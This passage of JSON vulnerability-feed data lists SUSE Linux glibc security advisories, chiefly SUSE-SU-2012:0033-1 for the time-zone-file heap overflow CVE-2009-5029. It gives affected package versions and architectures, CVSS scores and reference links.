"glibc-locale-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.1-0.34.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-devel-32bit-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-profile-x86-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-profile-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "nscd-2.11.1-0.34.1.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-info-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-x86-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-info-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-devel-32bit-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-devel-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-devel-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i686", "packageFilename": "glibc-2.11.1-0.34.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "nscd-2.11.1-0.34.1.s390x.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-profile-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-html-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-locale-32bit-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-html-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-info-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-profile-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "nscd-2.11.1-0.34.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "nscd-2.11.1-0.34.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-info-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-2.11.1-0.34.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-2.11.1-0.34.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-locale-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-profile-32bit-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i686", "packageFilename": "glibc-2.11.1-0.34.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-32bit-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.1-0.34.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "nscd-2.11.1-0.34.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-info-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-html-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "nscd-2.11.1-0.34.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-locale-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i686", "packageFilename": "glibc-2.11.1-0.34.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-info-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-profile-32bit-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "nscd-2.11.1-0.34.1.ppc64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.1-0.34.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-locale-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-locale-32bit-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-html-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "nscd-2.11.1-0.34.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-32bit-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ppc64", "packageFilename": "glibc-html-2.11.1-0.34.1.ppc64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "s390x", "packageFilename": "glibc-2.11.1-0.34.1.s390x.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-2.11.1-0.34.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "ia64", "packageFilename": "glibc-locale-x86-2.11.1-0.34.1.ia64.rpm", "packageName": "glibc-locale-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "nscd-2.11.1-0.34.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "i586", "packageFilename": "glibc-html-2.11.1-0.34.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.34.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-0.34.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "reporter": "Suse", "published": "2012-01-05T12:25:46", "title": "Security update for glibc (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "modified": "2012-01-05T12:25:46", "id": "SUSE-SU-2012:0033-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00032.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:38", "references": ["http://download.novell.com/patch/finder/?keywords=aba5a35b05cac6339a45d9264306d85b", "https://bugzilla.novell.com/661460", "https://bugzilla.novell.com/735850"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext", "packageFilename": "glibc-dceext-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc", "packageFilename": "glibc-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel-32bit", "packageFilename": "glibc-devel-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-x86", "packageFilename": "glibc-x86-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-32bit", "packageFilename": "glibc-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.4-31.97.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-dceext-32bit", "packageFilename": "glibc-dceext-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "nscd", "packageFilename": "nscd-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SLE SDK", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile-32bit", "packageFilename": "glibc-profile-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel-32bit", "packageFilename": "glibc-devel-32bit-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "2.4-31.97.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.4-31.97.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux 